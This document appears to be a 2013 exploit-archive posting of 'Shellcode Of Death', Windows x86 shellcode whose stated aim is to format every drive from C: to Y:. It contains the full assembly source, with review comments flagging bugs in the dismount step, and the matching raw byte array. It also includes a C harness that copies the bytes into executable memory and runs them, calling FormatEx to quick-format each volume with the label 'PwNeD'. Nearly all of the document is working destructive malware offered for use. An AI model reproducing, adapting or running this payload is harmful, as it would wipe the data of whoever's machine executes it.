

Shellcode Of Death
Posted Apr 9, 2013
Authored by Ashfaq Ansari, Ruei-Min Jiang

This shellcode has been designed to format all the available drives on Windows.

tags | shellcode
systems | windows
MD5 | e75c2fb2b63b997f58e082060fa5d65b

ShellcodeOfDeath has been designed to format every available drive on Windows: it walks the drive letters C: through Y: in turn and calls fmifs!FormatEx on each one.

Disclaimer: This shellcode is developed for educational purposes only. The authors
do not and will not accept any responsibility for illegal or unauthorized use
of #ShellcodeOfDeath. Any use of this shellcode is at the reader's own risk.

Home Page: http://hacksys.vfreaks.com/

Post Link: http://hacksys.vfreaks.com/research/shellcode-of-death.html

You may download Shellcode Of Death archive from the above link.


======================================================================
Start Of Code - ShellcodeOfDeath.s
======================================================================

/*
* _ __ _____
* /\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
* / /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
* / __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
* \/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
* |___/
* http://hacksys.vfreaks.com/
* hacksysteam@hotmail.com
*
* Shellcode Of Death
* v1.0
*
* Ruei-Min Jiang (@mike820324) a.k.a MicroMike
* Ashfaq Ansari (ashfaq_ansari1989@hotmail.com)
*
* Still a lot can be done to improve this shellcode. This is the first release.
* Further, a lot of improvement and optimization can be done to this shellcode.
* Any bugs, suggestions or contribution is most welcomed.
*
* Length of shellcode: 387 bytes
* Number of NULL byte: 49
*
* Notes: Most of the NULL bytes come from the UTF-16 strings that the fmifs
* API expects (every ASCII code unit carries a 0x00 high byte) and from a few
* 32-bit immediates. They can be reduced further; alternatively, any simple
* XOR encoder will strip them from the final payload.
*
* Things to do:
* 1. Code cleanup
* 2. Optimization
* 3. Minification
* 4. Add suggestions
*/
/*
 * Syntax/target: GNU as, AT&T syntax, 32-bit x86, Windows user mode.
 * Everything that follows is position-independent shellcode: no section
 * directives, no absolute addresses; the data it needs is placed inline
 * after the code and located at run time with call/pop.
 * Entry simply skips over the two resolver subroutines below.
 */
.globl _main

_main:
jmp start_shell;
/*
 * hash_function: linear scan of an export-name table for a given hash.
 *
 * Inputs:
 *   %edx  base address of the module being searched
 *   %ebx  VA of the export directory's AddressOfNames table (an array of
 *         RVAs, one per exported name)
 *   %ecx  hash value to look for
 * Output:
 *   %eax  index of the first name whose hash equals %ecx (this is the
 *         index into AddressOfNameOrdinals that get_address uses next)
 * Clobbers: %esi, flags. %ebx is saved/restored around the inner loop.
 *
 * Hash: h = 0; for every byte c of the name, including the terminating
 * NUL: h = rol32(h, 5) + c; then ror32(h, 5) once to undo the rotation
 * that preceded adding the NUL. Equivalent to rol5-add over the name
 * bytes without the terminator.
 *
 * NOTE(review): there is no upper bound against NumberOfNames. If the
 * hash is absent (name not exported on the target OS, or a miscomputed
 * constant) the scan walks past the end of the table and dereferences
 * garbage instead of failing cleanly.
 */
hash_function:
xorl %eax,%eax;                          /* eax = index 0 */
next_entry:
mov (%ebx,%eax,4), %esi;                 /* esi = AddressOfNames[index] (RVA) */
addl %edx, %esi;                         /* ... + base -> VA of the ASCII name */
push %ebx;                               /* keep table pointer and index across the inner loop */
push %eax;
xor %ebx, %ebx;                          /* ebx = running hash */
continue_hash:
xor %eax, %eax;
lodsb;                                   /* al = *esi++ */
rol $5, %ebx;
addl %eax, %ebx;
cmp $0, %eax;                            /* the NUL has been folded in -> stop */
jnz continue_hash;
ror $5, %ebx;                            /* undo the rol applied before adding the NUL */
cmp %ecx, %ebx;
pop %eax;                                /* pop does not touch flags; the cmp result survives */
pop %ebx;
je hash_finish;
inc %eax;                                /* try the next name */
jmp next_entry;
hash_finish:
ret;

/*
 * get_address: resolve an export by name hash (PE32 / 32-bit process only).
 *
 * Inputs:
 *   %edx  module base address
 *   %ecx  hash of the wanted export name (see hash_function)
 * Output:
 *   %eax  VA of the export
 * Clobbers: %ebx, %ecx, %esi, flags. %edx is preserved -- the caller
 * relies on that when resolving several names from the same module.
 *
 * Fixed header offsets used:
 *   0x3c  IMAGE_DOS_HEADER.e_lfanew
 *   0x78  NT headers -> DataDirectory[EXPORT].VirtualAddress (PE32 layout)
 *   export directory: 0x1c AddressOfFunctions, 0x20 AddressOfNames,
 *                     0x24 AddressOfNameOrdinals
 *
 * NOTE(review): forwarded exports are not handled -- for a forwarder the
 * returned VA points at the forwarder string, not at code. Confirm each
 * hashed API is a real (non-forwarded) export on the OS you target.
 */
get_address:
PE_init:
movl %edx, %eax;
movl 0x3c(%eax), %eax;                   /* eax = e_lfanew */
movl 0x78(%edx, %eax), %eax;             /* eax = export directory RVA */
leal (%edx, %eax), %eax;                 /* eax = export directory VA */
pushl %eax;                              /* saved for the ordinal/function lookups */
movl 0x20(%eax), %eax;                   /* AddressOfNames RVA */
leal (%edx, %eax), %ebx;                 /* ebx = AddressOfNames VA (hash_function input) */
call hash_function;                      /* eax = index of the matching name */

popl %ebx;                               /* ebx = export directory VA */
movl 0x24(%ebx), %ecx;
leal (%edx, %ecx), %ecx;                 /* ecx = AddressOfNameOrdinals VA */
movw (%ecx, %eax, 2), %ax;               /* ax = ordinal; upper half of eax still holds the index */
andl $0x0000ffff, %eax;                  /* zero-extend (a movzwl would avoid the two NULs in this imm32) */

movl 0x1c(%ebx), %ebx;
leal (%edx, %ebx), %ebx;                 /* ebx = AddressOfFunctions VA */
movl (%ebx, %eax, 4), %eax;              /* eax = function RVA */
leal (%edx, %eax), %eax;                 /* eax = function VA */
ret;
/*
 * Name hashes consumed by get_address (rol5-add, see hash_function).
 *
 *  kernel32.dll
 *   LoadLibraryA    = 0x331adddc
 *   CloseHandle     = 0xd7629096
 *   CreateFileA     = 0xcfb0e506
 *   ExitProcess     = 0xec468f87
 *   Sleep           = 0x0567a110
 *   DeviceIoControl = 0x3b34d4a7   (the export is spelled "DeviceIoControl")
 *  fmifs.dll
 *   FormatEx        = 0xab025b64
 *
 * NOTE(review): CreateFileA is the ANSI entry point, but CreateFile_call
 * hands it the UTF-16 buffer at string_start ("\\.\C:\" stored as
 * 0x5c 0x00 0x5c 0x00 ...). Read as ANSI that is the one-byte path "\",
 * so the open fails and the FSCTL_DISMOUNT_VOLUME request that follows is
 * a no-op. The same hash function gives 0xcfb0e51c for "CreateFileW"
 * (only the last byte added differs, 'W' - 'A' = 0x16; hash collisions
 * with earlier kernel32 names are not checked). Changing the constant
 * keeps the length but means the published byte array, length and NULL
 * count must be regenerated.
 */
start_shell:
set_Kernel32_env:
xorl %ecx, %ecx                          /* cl = 0, compared against a UTF-16 code unit below */
movl %fs:0x30, %eax;                     /* eax = PEB (TEB+0x30) */
movl 0xc(%eax), %eax;                    /* eax = PEB->Ldr */
movl 0x1c(%eax), %eax;                   /* eax = Ldr->InInitializationOrderModuleList.Flink */
next_module:
movl 0x8(%eax), %edx;                    /* edx = entry DllBase (InInitOrder links +0x8) */
movl 0x20(%eax), %edi;                   /* edi = entry BaseDllName.Buffer (UTF-16) */
movl (%eax), %eax;                       /* eax = next entry */
cmp 0x18(%edi), %cl;                     /* name[12] == 0, i.e. exactly 12 chars -> "kernel32.dll" */
jne next_module;
/*
 * NOTE(review): the match above is by name length only. Any 12-character
 * module that appears before kernel32.dll in initialization order would
 * be picked instead, and the walk never terminates if nothing matches.
 * Treat this as XP-era behaviour and re-check on every target OS.
 */

set_hash_table:
pushl $0xab025b64;                       /* FormatEx   -> hash[6], resolved from fmifs.dll */
pushl $0x0567a110;                       /* Sleep */
pushl $0x3b34d4a7;                       /* DeviceIoControl */
pushl $0xd7629096;                       /* CloseHandle */
pushl $0xec468f87;                       /* ExitProcess */
pushl $0xcfb0e506;                       /* CreateFileA */
pushl $0x331adddc;                       /* LoadLibraryA -> hash[0] */
movl %esp, %ebp;                         /* ebp = &hash[0]; hash[i] is at 4*i(%ebp) */
end_hash_table:
set_api_table:
init_variable:
pushl $7;
popl %ecx;                               /* ecx = 7 entries to resolve */
xorl %edi, %edi;                         /* edi = index into the hash table (callee-saved across calls) */
loop_start:
cmp $1, %ecx;
jne set_kernel32_api;                    /* entries 0..5 come from kernel32 (%edx) */
set_fmifs_env:
pushl %ecx;                              /* LoadLibraryA clobbers ecx */
jmp data_string;
back_to_here:
restore_loadlibrary:
movl 0x1c(%esp), %eax;                   /* stack: "fmifs.dll" ptr, saved ecx, 6 resolved addrs; +0x1c = LoadLibraryA */
call *%eax;                              /* LoadLibraryA("fmifs.dll"); stdcall pops the string pointer */
movl %eax, %edx;                         /* edx = fmifs.dll base for the FormatEx lookup (NULL on failure, unchecked) */
popl %ecx;
set_kernel32_api:
pushl %ecx;                              /* get_address clobbers ecx */
movl (%ebp, %edi, 4), %ecx;              /* ecx = hash[edi] */
call get_address;
popl %ecx;
pushl %eax;                              /* resolved address goes on the stack, in order */
inc %edi;
loop loop_start;
movl %esp, %ebp;                         /* ebp = API table: (%ebp) FormatEx, 0x4 Sleep, 0x8 DeviceIoControl,
                                            0xc CloseHandle, 0x10 ExitProcess, 0x14 CreateFileA, 0x18 LoadLibraryA */
jmp start_main_code;
data_string:
call back_to_here;                       /* pushes the address of the string that follows */
.string "fmifs.dll";

/*
 * start_main_code: format drives C: through Y: in turn, then exit.
 *
 * Register use:
 *   %ebp  API table built above ((%ebp) FormatEx, 0x4 Sleep,
 *         0x8 DeviceIoControl, 0xc CloseHandle, 0x10 ExitProcess,
 *         0x14 CreateFileA)
 *   %esi  address of string_start (UTF-16 "\\.\C:\"); the other inline
 *         strings and the callback are reached as fixed offsets from it
 *   %edi  loop counter parked across the calls (edi survives stdcall
 *         calls; ecx does not)
 *
 * The drive letter is advanced by incrementing the 'C' code unit inside
 * the shellcode's own data (addl $1, 0x8(%esi)), so the buffer this runs
 * from must be writable as well as executable.
 *
 * NOTE(review), CreateFile_call: the resolved import is CreateFileA but
 * %esi points at a UTF-16 string. The ANSI reader stops at the 0x00 that
 * follows the first 0x5c, so the path actually opened is "\" -- not the
 * volume -- and the handle passed on to DeviceIoControl/CloseHandle is
 * INVALID_HANDLE_VALUE. The FSCTL_DISMOUNT_VOLUME (0x90020) request
 * therefore never reaches a volume. Fixing this needs CreateFileW and,
 * most likely, a path without the trailing backslash ("\\.\C:" names the
 * volume device; "\\.\C:\" is its root directory -- verify on the target
 * OS). No return value in this loop is checked, so all of that fails
 * silently, and FormatEx is invoked on L"C:\" etc. regardless.
 *
 * Each iteration also leaves 8 bytes on the stack (the lpBytesReturned
 * slot and the handle copy are never popped): 23 iterations -> 184 bytes.
 * Harmless here, but keep it in mind if the loop bound is raised.
 */
start_main_code:
Get_string_addr:
jmp 2f;
1:;
popl %esi;                               /* esi = string_start (pushed by call 1b) */
Format_start_loop:
pushl $23;
popl %ecx;                               /* 23 drives: 'C' + 22 = 'Y' */
format_loop_start:
movl %ecx, %edi;                         /* save the counter; the calls below clobber ecx */

CreateFile_call:
xorl %edx, %edx;
pushl %edx;                              /* hTemplateFile = NULL */
pushl %edx;                              /* dwFlagsAndAttributes = 0 */
pushl $3;                                /* dwCreationDisposition = OPEN_EXISTING */
pushl %edx;                              /* lpSecurityAttributes = NULL */
pushl $3;                                /* dwShareMode = FILE_SHARE_READ | FILE_SHARE_WRITE */
pushl $0xc0000000;                       /* dwDesiredAccess = GENERIC_READ | GENERIC_WRITE */
pushl %esi;                              /* lpFileName = string_start (UTF-16 -- see note above) */
movl 0x14(%ebp), %ebx;
call *%ebx;                              /* CreateFileA(...) -> eax = handle, never checked */
Store_File_Handle:
pushl %eax;                              /* keep the handle for CloseHandle */
subl $0x4, %esp;                         /* 4-byte slot for lpBytesReturned */
xorl %edx, %edx;
DeviceIOControl_call:
pushl %edx;                              /* lpOverlapped = NULL */
leal 0x4(%esp), %ebx                     /* ebx = &slot */
pushl %ebx;                              /* lpBytesReturned */
pushl %edx;                              /* nOutBufferSize = 0 */
pushl %edx;                              /* lpOutBuffer = NULL */
pushl %edx;                              /* nInBufferSize = 0 */
pushl %edx;                              /* lpInBuffer = NULL */
pushl $0x90020;                          /* dwIoControlCode = FSCTL_DISMOUNT_VOLUME */
pushl %eax;                              /* hDevice = handle from CreateFile */
movl 0x8(%ebp), %ebx
call *%ebx;                              /* DeviceIoControl(...), result ignored */
close_file_handle:
pushl 0x4(%esp);                         /* the handle sits just above the 4-byte slot */
movl 0xc(%ebp), %ebx;
call *%ebx;                              /* CloseHandle(handle) */

FormatEx_call:
leal call_back-string_start(%esi),%eax;
pushl %eax;                              /* Callback = call_back */
pushl $4096;                             /* ClusterSize */
pushl $1;                                /* QuickFormat = TRUE */
leal volume_label-string_start(%esi), %eax;
pushl %eax;                              /* Label = L"PwNeD" */
leal string2_start-string_start(%esi), %eax;
pushl %eax;                              /* Format = L"NTFS" */
pushl $0xc;                              /* MediaFlag = 0xc (FMIFS_HARDDISK in the fmifs media enum -- confirm) */
leal 0x8(%esi), %eax;
pushl %eax;                              /* DriveRoot = L"C:\" (tail of string_start) */
movl (%ebp), %ebx;
call *%ebx;                              /* FormatEx(...) */
sleep_call:
pushl $200;
movl 0x4(%ebp), %ebx
call *%ebx;                              /* Sleep(200 ms) */
loop_end:
movl %edi, %ecx                          /* restore the loop counter */
addl $1, 0x8(%esi);                      /* 'C' -> 'D' -> ... in the drive string (self-modifying data) */
loop format_loop_start;

exit_process:
push $0;
movl 0x10(%ebp), %ebx;
call *%ebx;                              /* ExitProcess(0) -- never returns */
2:;
call 1b;                                 /* pushes the address of string_start; 1: pops it into esi */
string_start:
/* UTF-16LE "\\.\C:\" + NUL. Offset 0x8 (the 'C') doubles as the DriveRoot
 * handed to FormatEx (L"C:\") and is the code unit the main loop increments
 * for each successive drive. */
.byte 0x5c, 0x00, 0x5c, 0x00, 0x2e, 0x00, 0x5c, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x00, 0x00
string2_start:
/* UTF-16LE "NTFS" + NUL: the file system name passed to FormatEx. */
.byte 0x4e, 0x00, 0x54, 0x00, 0x46, 0x00, 0x53, 0x00, 0x00, 0x00
/*
 * Volume label (UTF-16LE "PwNeD" + NUL) applied to each volume after
 * formatting. Change the bytes here for a different label; keep the
 * two-byte NUL terminator, and remember that the C byte array, the
 * published length and the NULL count must then be regenerated.
 * Default value -- PwNeD
 */
volume_label:
.byte 0x50, 0x00, 0x77, 0x00, 0x4E, 0x00, 0x65, 0x00, 0x44, 0x00, 0x00, 0x00
/*
 * call_back: progress callback handed to FormatEx.
 * stdcall with three dword arguments (ret $0xc cleans 12 bytes), matching
 * the fmifs callback shape (command, sub-action, action-info). It ignores
 * every notification and always returns 1 (TRUE); per the fmifs convention
 * a FALSE return would abort the format -- confirm against the target
 * fmifs.dll if the callback is ever made to do more. push/pop %ebp keeps
 * the caller's frame pointer intact.
 */
call_back:
push %ebp;
movl %esp, %ebp;
xorl %eax, %eax;
inc %eax;                                /* eax = 1 (TRUE) */
pop %ebp;
ret $0xc;

======================================================================
End Of Code - ShellcodeOfDeath.s
======================================================================


======================================================================
Testing Shellcode - ShellcodeTestUnEncoded.c
======================================================================

#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <conio.h>
#include <windows.h>
#endif

/*
_ __ _____
/\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
/ /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
/ __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
\/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
|___/

http://hacksys.vfreaks.com/
hacksysteam@hotmail.com

Module Name:

Shellcode Test UnEncoded (ShellcodeTestUnEncoded.c)

Abstract:

This program is a template for running C-style formatted shellcode.
The byte array below is the raw, unencoded ShellcodeOfDeath payload
(it begins with the jmp/xor prologue of the .s file; no decoder stub
is prepended), so it still contains NULL bytes and is intended to be
executed from a buffer in this harness, not copied as a C string.

IDE:

Dev-C++ 4.9.9.2 (Windows XP SP3)

Compiler:

gcc 3.4.2

*/

/*
 * Byte rendering of ShellcodeOfDeath.s (unencoded). Regenerate it from the
 * assembly whenever the .s file changes: the jmp and lea offsets inside are
 * relative, so any edit that changes the length of an instruction or string
 * shifts everything after it.
 *
 * Landmarks, matched against the .s source:
 *   \xeb\x5a                       jmp start_shell (skips the two resolvers)
 *   \x64\xa1\x30\x00\x00\x00       movl %fs:0x30,%eax (PEB walk begins)
 *   "fmifs.dll"                    ASCII, passed to LoadLibraryA
 *   UTF-16LE "\\.\C:\", "NTFS" and the "PwNeD" label near the tail
 *   \x55\x89\xe5\x31\xc0\x40\x5d\xc2\x0c\x00   the FormatEx callback
 *
 * The payload increments the 'C' of "\\.\C:\" in place for each drive, so
 * it must execute from memory that is writable as well as executable (see
 * main). The \x00\x00 that opens the last line is the label's UTF-16 NUL
 * terminator, not padding.
 *
 * WARNING: executing this formats drives. Only run it in a throwaway VM.
 */
unsigned char shellcode[] =
"\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50"
"\x31\xdb\x31\xc0\xac\xc1\xc3\x05\x01\xc3\x83"
"\xf8\x00\x75\xf3\xc1\xcb\x05\x39\xcb\x58\x5b"
"\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c"
"\x8b\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20"
"\x8d\x1c\x02\xe8\xc3\xff\xff\xff\x5b\x8b\x4b"
"\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25\xff\xff"
"\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83"
"\x8d\x04\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00"
"\x00\x8b\x40\x0c\x8b\x40\x1c\x8b\x50\x08\x8b"
"\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68\x64"
"\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4"
"\x34\x3b\x68\x96\x90\x62\xd7\x68\x87\x8f\x46"
"\xec\x68\x06\xe5\xb0\xcf\x68\xdc\xdd\x1a\x33"
"\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75"
"\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89"
"\xc2\x59\x51\x8b\x4c\xbd\x00\xe8\x6b\xff\xff"
"\xff\x59\x50\x47\xe2\xe0\x89\xe5\xeb\x0f\xe8"
"\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64"
"\x6c\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf"
"\x31\xd2\x52\x52\x6a\x03\x52\x6a\x03\x68\x00"
"\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3\x50\x83"
"\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52"
"\x52\x52\x52\x68\x20\x00\x09\x00\x50\x8b\x5d"
"\x08\xff\xd3\xff\x74\x24\x04\x8b\x5d\x0c\xff"
"\xd3\x8d\x86\x26\x00\x00\x00\x50\x68\x00\x10"
"\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50"
"\x8d\x86\x10\x00\x00\x00\x50\x6a\x0c\x8d\x46"
"\x08\x50\x8b\x5d\x00\xff\xd3\x68\xc8\x00\x00"
"\x00\x8b\x5d\x04\xff\xd3\x89\xf9\x83\x46\x08"
"\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8"
"\x7d\xff\xff\xff\x5c\x00\x5c\x00\x2e\x00\x5c"
"\x00\x43\x00\x3a\x00\x5c\x00\x00\x00\x4e\x00"
"\x54\x00\x46\x00\x53\x00\x00\x00"
// Volume Label (UTF-16LE "PwNeD"). You may want to change this; keep the
// two-byte NUL terminator that follows and regenerate the length/NULL counts.
// Default: PwNeD
"\x50\x00\x77\x00\x4e\x00\x65\x00\x44\x00"
// Volume Label End
"\x00\x00\x55\x89\xe5\x31\xc0\x40\x5d\xc2\x0c\x00";


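/*
 * Harness entry point: print the shellcode length and its NULL-byte
 * count, wait for a keypress, then transfer control into the payload.
 *
 * The payload rewrites one of its own embedded bytes while it runs (the
 * drive letter inside the "\\.\C:\" string is incremented per iteration),
 * so it needs memory that is writable AND executable. Jumping straight into
 * the .data array only works where DEP is off; on Windows the bytes are
 * therefore copied into a fresh PAGE_EXECUTE_READWRITE allocation first.
 *
 * Returns 1 if the executable buffer cannot be allocated. It never returns
 * normally otherwise: the payload ends in ExitProcess(0).
 *
 * WARNING: running this formats every volume the payload can open. Only
 * run it inside a disposable virtual machine.
 */
int main(void)
{
    size_t i;
    size_t badchar_c = 0;
    size_t len = sizeof(shellcode) - 1;      /* drop the string literal's trailing NUL */
    void (*entry)(void);

    /* size_t is cast for portable printing (msvcrt has no %zu). */
    printf("\n\nShellcode Length: %lu\n", (unsigned long)len);

    for (i = 0; i < len; ++i) {
        if (shellcode[i] == 0x00) {
            ++badchar_c;
        }
    }
    printf("\nNumber of badchar: %lu\n\n", (unsigned long)badchar_c);

    printf("\nPress any key to execute shellcode....\n\n");

#ifdef _WIN32
    getch();
    {
        /* RWX copy: the payload self-modifies and must be executable under DEP. */
        void *exec = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE,
                                  PAGE_EXECUTE_READWRITE);
        if (exec == NULL) {
            fprintf(stderr, "VirtualAlloc failed: %lu\n",
                    (unsigned long)GetLastError());
            return 1;
        }
        memcpy(exec, shellcode, len);
        entry = (void (*)(void))exec;
    }
#else
    /* The payload is Windows-only (it walks the PEB via fs:[0x30]); this
     * branch exists so the harness still builds elsewhere. */
    getchar();
    entry = (void (*)(void))shellcode;
#endif

    entry();

    return 0;
}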

======================================================================
End Testing Shellcode - ShellcodeTestUnEncoded.c
======================================================================
